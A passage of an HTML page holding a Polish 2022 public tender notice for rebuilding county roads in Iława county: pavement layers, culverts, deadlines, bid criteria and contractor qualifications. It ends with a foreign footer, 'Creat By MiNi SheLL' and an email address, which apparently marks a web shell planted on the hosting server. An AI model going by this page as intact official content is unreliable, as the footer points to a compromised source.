m.<br/>W związku z przebudową drogi powiatowej nr 1339N istniejące zjazdy na drogi, pola i do posesji zostaną wykonane z mieszanki mineralno – asfaltowej AC11S gr. 4 cm. Pod zjazdami należy wyremontować przepusty. Wlot i wylot rur zabezpieczyć prefabrykowanymi ściankami czołowymi. Istniejący przepusty pod zjazdami należy oczyścić z namułu naniesionego płynącą wodą. <br/>Na drugim odcinku od km 1+377 do km 1+770 przebudowana zostanie istniejąca nawierzchnia bitumiczna jezdni wraz ze zjazdami publicznymi i indywidualnymi do posesji i na drogi. Istniejąca szerokość jezdni pozostanie niezmieniona i będzie miła 5,00 m. Zaprojektowano odprowadzenie wód opadowych z jezdni powierzchniowo na przyległy teren pasa drogowego i do istniejących rowów drogowych, które w trakcie inwestycji zostaną oczyszczone i wyprofilowane zapewniając sprawne odprowadzenie wód opadowych poza korpus drogi. Istniejąca nawierzchnia jezdni zostanie wyrównana mieszanką mineralno – asfaltową AC11P gr. 3 cm. Na tak przygotowanej warstwie ułożona zostanie siatka do zbrojenia. Siatka wzmacniająca na całej szerokości jezdni. Na zabezpieczonym przed spękaniami podłożu ułożona zostanie warstwa ścieralna z mieszanki mineralno – asfaltowej AC11S o gr. 4 cm. Pobocza po obu stronach jezdni zostaną uzupełnione kruszywem 0/31,5 mm łamanym C50/30 o grubości 15 cm po zagęszczeniu. Szerokość pobocza 0,75 m. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy wyznaczonego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie 4: <br/>„Przebudowa drogi powiatowej Nr 1269N gr. woj. (Trumieje) – Biskupiczki w msc. Butowo”<br/> Szerokość 5,00 mb, długość 995,00 mb<br/>Przedmiotowe przedsięwzięcie zlokalizowane jest w powiecie iławskim, na terenie gm. Kisielice w miejscowości Butowo w ciągu drogi powiatowej nr 1269N relacji gr. woj. (Turmieje) – Biskupiczki ( DK16 ) na odcinku o dł. 995,00 mb. Na projektowanym odcinku od km 0+000 do km 0+213 i 0+316 do km 0+796 posiada nawierzchnię z kostki brukowej granitowej 17/21 cm. Na odcinku od km 0+213 do km 0+316 i od km 0+796 do km 0+995 z mieszanki mineralno - asfaltowej. Szerokość jezdni z kostki brukowej ca. 5,00 – 5,10 m natomiast jezdnia bitumiczna na odcinku od km 0+796 do km 0+995 ma szerokość 3,80 – 4,00 m. Pobocza gruntowe o szerokości 0,50 – 0,75 m. Po prawej stronie jezdni od km 0+000 do km 0+796 chodnik prawostronny o szerokości 2,0 m z kostki brukowej betonowej. Na pozostałym odcinku drogi po prawej i lewej stronie nieregularne rowy. Nawierzchnia bitumiczna jezdni na całym odcinku jest spękana z licznymi wysadzinami. Nawierzchnia z bruku granitowego również z dużymi nierównościami uniemożliwiającymi prawidłowy spływ wód opadowych z jezdni. W poboczu po obu stronach jezdni znajdują się ubytki gruntu wymyte przez spływające wody opadowe przy krawędzi jezdni. W km 0+274,4 i km 570,80 istniejące przepusty betonowe. Pod zjazdami lewostronnymi na pola i do posesji w ciągu istniejącego rowu przepusty betonowe.<br/>W ramach planowanego zadnia przewiduje się przebudowę jezdni drogi powiatowej nr 1269N na odcinku od km 0+000 do km 0+995 w obrębie miejscowości Butowo. <br/>Wykonawca robót dokona rozbiórki istniejącej nawierzchni drogi z kostki brukowej granitowej od km 0+000 do km 0+796. Pozyskany materiał Wykonawca dostarczy na plac OD Susz mieszczący się w Karolewo 17. Istniejący chodnik prawostronny pozostanie bez zmian. Wykonana zostanie warstwa odsączająca z piasku o gr. 20 cm następnie podbudowa zasadnicza z kruszywa 0/31,5 mm łamanego stabilizowanego mechanicznie o gr. 25 cm. Po ułożeniu warstwy podbudowy należy dokonać korekty wysokości zjazdów na posesje przez istniejący chodnik. Podbudowę należy tak przygotować, żeby wysokość istniejącego krawężnika od nawierzchni warstwy ścieralnej wynosiła 10-12 cm. Warstwa podbudowy zostanie przykryta warstwą wiążącą z mieszanki mineralno-asfaltowej AC16W gr. 5 cm. Warstwa ścieralna jezdni zostanie wykonana z mieszanki mineralno – asfaltowej AC11S gr. 4 cm.<br/>Istniejąca nawierzchnia bitumiczna jezdni od km 0+796 do km 0+995 zostanie przebudowana i poszerzona do 5,00 m. Poszerzenie o ok. 1,2 m zaprojektowano przy lewej krawędzi jezdni. Warstwy konstrukcyjne poszerzenia jezdni wykonane zostaną z warstwy odsączającej z pisaku o gr. 20 cm, podbudowy zasadniczej z kruszywa 0/31,5mm łamanego o grubości 25 cm, warstwy wiążącej z mieszanki mineralno – asfaltowej AC16W gr. 5 cm. Połączenie nowej i starej nawierzchni zostanie wzmocnione siatką do zbrojenia. Siatkę należy ułożyć na całej szerokości jezdni. Po ułożeniu siatki wzmacniającej całość jezdni zostanie wyrównana mieszanką mineralno – asfaltową AC11P gr. 3 cm. Następnie ułożona zostanie warstwa ścieralna z mieszanki mineralno – asfaltowej AC11S o gr. 4 cm po zagęszczeniu. Pobocza z kruszywa 0/31,5 mm łamanego o grubości 15 cm wykonać po obu stronach. Szerokość pobocza 0,75 m.<br/>Zaprojektowano odprowadzenie wód opadowych z jezdni powierzchniowo na przyległy teren pasa drogowego i do istniejących rowów drogowych, które w trakcie inwestycji zostaną oczyszczone i wyprofilowane zapewniając sprawne odprowadzenie wód opadowych poza korpus drogi.<br/>W związku z przebudową drogi powiatowej nr 1269N istniejące zjazdy lewo i prawostronne poza chodnikiem na drogi, pola i do posesji zostaną wykonane z mieszanki mineralno – asfaltowej AC11S gr. 4 cm. Pod zjazdami i pod drogą należy wyremontować przepusty. Wlot i wylot rur zabezpieczyć prefabrykowanymi ściankami czołowymi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-21</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy wyznaczonego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> zadanie 5: <br/>„Przebudowa drogi powiatowej Nr 1200N gr. wojew. (Kołodzieje)-Bałoszyce-Babięty Wlk.”<br/>Szerokość 5,50 mb, długość 995,00 mb<br/>Przedmiotowe przedsięwzięcie zlokalizowane jest w powiecie iławskim, na terenie gm. Susz w miejscowości Jakubowo Kisielickie. Inwestycja dotyczy przebudowy nawierzchni jezdni drogi powiatowej nr 1200N relacji gr. woj. (Kołodzieje)-Bałoszyce-Babięty Wielkie dł. 995,00 mb od km 11+655 do km 12+650 w kierunku miejscowości Babięty Wielkie. Na projektowanym odcinku droga o długości 995,00 mb posiada nawierzchnię z mieszanki mineralno - asfaltowej. Szerokość jezdni wynosi ca. 4,80 m. Pobocza gruntowe o szerokości 0,50 – 0,75 m. Po prawej i lewej stronie jezdni zarośnięte i nieregularne rowy. Nawierzchnia jezdni na całym odcinku jest spękana z licznymi wysadzinami. W poboczu po obu stronach jezdni znajdują się ubytki gruntu wymyte przez spływające wody opadowe przy krawędzi jezdni. W km 12+485,4 istniejący przepust betonowy jednostronnie ograniczony barierą betonową. W obrębie przepustu istniejący wpust uliczny z odprowadzeniem wód opadowych do istniejącej studni.<br/>W ramach planowanego zadnia przewiduje się przebudowę istniejącej nawierzchni bitumicznej drogi powiatowej wraz ze zjazdami publicznymi i indywidualnymi do posesji oraz poszerzenie jezdni do 5,50 m. Poszerzenie o 0,7÷0,8 m zaprojektowano przy prawej i lewej krawędzi jezdni w zależności od przebiegu drogi w pasie drogowym. Zaprojektowano odprowadzenie wód opadowych z jezdni powierzchniowo na przyległy teren pasa drogowego i do istniejących rowów drogowych, które w trakcie inwestycji zostaną oczyszczone i wyprofilowane. Warstwy konstrukcyjne poszerzenia jezdni wykonane zostaną z warstwy odsączającej z pisaku o gr. 20 cm, podbudowy zasadniczej z kruszywa 0/31,5mm łamanego o grubości 25 cm. Na poszerzeniu ułożona zostanie warstwa wiążąca z mieszanki mineralno – asfaltowej AC16W gr. 5 cm. Po wykonaniu warstwy wiążącej połączenia nowej i starej nawierzchni zostanie wzmocnione siatką do zbrojenia. Szerokość siatki wzmacniającej 1,95 m. Po ułożeniu siatki wzmacniającej całość jezdni zostanie wyrównana mieszanką mineralno – asfaltową AC11P gr. 3 cm. Na tak przygotowanej oczyszczonej i skropionej warstwie ułożona zostanie warstwa ścieralna z mieszanki mineralno – asfaltowej AC11S o gr. 4 cm. Po obu stronach jezdni zostaną uzupełnione kruszywem pobocza 0/31,5 mm łamanym o grubości 15 cm po zagęszczeniu. Szerokość pobocza 0,75 m. Istniejące zjazdy na drogi, pola i do posesji zostaną wykonane z mieszanki mineralno – asfaltowej AC11S gr. 4 cm. Konstrukcja zjazdów tożsama z konstrukcją jezdni na poszerzeniu. Pod zjazdami należy wyremontować przepusty. Wlot i wylot rury zabezpieczyć prefabrykowanymi ściankami czołowymi. Istniejący przepust w km 12+485,4 należy oczyścić z namułu naniesionego płynącą wodą. Skarpy przy przepuście zostaną po obu stronach umocnione płytami ażurowymi o wymiarach 8x60x40cm. Płyty ażurowe należy kołkować drewnianym palikiem 4,5x4,5x50 cm. Przestrzenie ażuru należy uzupełnić pospółką. <br/>Na odcinku od zjazdu w km 12+460,9 do km 12+554,0 przy prawej krawędzi jezdni zaprojektowano krawężnik najazdowy 15x22 cm na ławie betonowej z oporem. Woda spływająca przy krawężniku będzie wpadała do istniejącego wpustu ulicznego 60x40 cm zaprojektowanego do remontu. <br/>UWAGA:<br/>Wykonawca zobowiązany jest do organizacji pracy dla zadania nr 5 aby zapewnić przejazd pełną szerokością jezdni w dniach 1-3 lipca 2022 r. z uwagi na odbywający się w tych dniach SUSZ TRIATHLON. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy wyznaczonego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4)	zdolności technicznej lub zawodowej:<br/>4.1)	doświadczenie zawodowe: <br/>a)	dla uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia Zamawiający żąda by Wykonawca wykazał, iż w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie) przed upływem terminu składania ofert ukończył realizację minimum dwóch zadań o wartości min. 300 000,00 zł brutto, polegające na budowie, przebudowie lub wykonaniu odnów na drodze publicznej o nawierzchni bitumicznej.<br/>b)	w przypadku wykonawców występujących wspólnie, o których mowa w art. 58 ust. 1 ustawy Pzp w celu wykazania spełniania warunku dotyczącego doświadczenia zawodowego, wykonawca musi wykazać, że co najmniej jeden z podmiotów wspólnie ubiegających się o udzielenie zamówienia zrealizował wymagane roboty budowalne, zgodnie z zasadami określonymi w lit. a);<br/>c)	jeżeli Wykonawca polega na zdolnościach technicznych lub zawodowych innego podmiotu, na zasadach określonych w art. 118 ust. 1 ustawy Pzp, w celu wykazania spełniania warunku dotyczącego doświadczenia zawodowego, wykonawca musi wykazać, że podmiot ten zrealizował wymagane roboty budowlane, zgodnie z zasadami określonymi lit. a);<br/>d)	w przypadku, gdy w zadaniu przedstawionym przez wykonawcę jako spełniające warunek, rozliczenie pomiędzy wykonawcą a zamawiającym za wykonane zamówienie zostało dokonane w innej walucie niż w złotych polskich, wykonawca (dla celu oceny oferty) dokona przeliczenia wartości wykonanych zamówień w innej walucie niż w złotych polskich – na podstawie średniego kursu złotego w stosunku do walut obcych określonego w tabeli kursów A średnich walut obcych Narodowego Banku Polskiego na dzień zamieszczenia ogłoszenia o zamówieniu z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, <br/>e)	jeżeli wykonawca powołuje się na doświadczenie w realizacji robót wykonywanych wspólnie z innymi wykonawcami, wykonawca musi wskazać, iż bezpośrednio uczestniczył w wykonywaniu wymaganych robót budowalnych, zgodnie z zasadami określonymi w lit. a)<br/>f)	ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie z Załącznikiem nr 2A do SWZ, o którym mowa w §IX ust. 1 SWZ, które stanowi wstępne potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu. Następnie na podstawie dokumentu, o którym mowa w §IX ust. 4 pkt 2 lit. a) SWZ, złożonego na wezwanie Zamawiającego, przez wykonawcę, którego oferta została najwyżej oceniona, tj. wykazu wykonanych robót. Do przedmiotowego wykazu (załącznika nr 3 do SWZ) należy dołączyć dowody potwierdzające, że wykazane roboty zostały wykonane w sposób należyty; <br/><br/>4.2)	kadra techniczna: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca na czas realizacji zamówienia będzie dysponował osobami o odpowiednich kwalifikacjach zawodowych niezbędnych do wykonania zamówienia, tj.:<br/>a)	kierownikiem robót w specjalności drogowej pełniącym jednocześnie rolę kierownika budowy. Minimalne wymagania: posiadający uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej do kierowania robotami budowlanymi lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w/w specjalności umożliwiające zrealizowanie przedmiotowego zamówienia oraz co najmniej 3 - letnie doświadczenie w kierowaniu robotami drogowym.<br/>b)	ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie z Załącznikiem nr 2A do SWZ, o którym mowa w §IX ust. 1 SWZ, które stanowi wstępne potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu. Następnie na podstawie dokumentu, o którym mowa w §IX ust. 4 pkt 2 lit. b) SWZ, złożonego na wezwanie Zamawiającego przez wykonawcę, którego oferta została najwyżej oceniona (zgodnie z załącznikiem nr 4 do SWZ). Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień dopuszcza odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia nabyte w innych niż Rzeczpospolita Polska państwach członkowskich Unii Europejskiej, państwach członkowskich Europejskiego porozumienia o wolnym Handlu (EFTA) - stronach umowy o Europejskim Obszarze Gospodarczym, Konfederacji Szwajcarskiej, zgodnie z art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej, wówczas wykonawca na własny koszt zapewni tłumacza języka polskiego, który zapewni stałe i biegłe tłumaczenie w kontaktach pomiędzy Zamawiającym a Wykonawcą, a także zapewni tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego zamówienia stworzonych zarówno przez Wykonawcę, jak i dostarczonych przez Zamawiającego. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają w/w warunek. Zamawiający dopuszcza pełnienie obowiązków kierowników robót ww. specjalnościach przez jedną osobę pod warunkiem posiadania przez nią wymaganych uprawnień dla poszczególnych branż. Zamawiający informuje, że wymaga, aby osoby wskazane w załączniku nr 4 do SWZ brały bezpośredni udział w wykonywaniu zamówienia.<br/><br/>4.3)	potencjał techniczny: <br/>Zamawiający nie stawia warunku w powyższym zakresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie z Załącznikiem nr 2A do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie z Załącznikiem nr 3 i 4 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w sytuacjach wymienionych w istotnych postanowieniach umowy § 11. Wszystkie postanowienia § 11 stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Zmiany te nie stanowią jednocześnie zobowiązania Zamawiającego do wyrażenia takiej zgody. W przypadku każdej zmiany, o której mowa powyżej po stronie wnoszącego propozycje zmian leży udokumentowanie powstałych okoliczności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-26 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferta oraz pozostałe oświadczenia i dokumenty, dla których Zamawiający określił wzory w formie formularzy zamieszczonych w załącznikach do SWZ przekazywane w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/pn/zd_ilawa</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-26 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com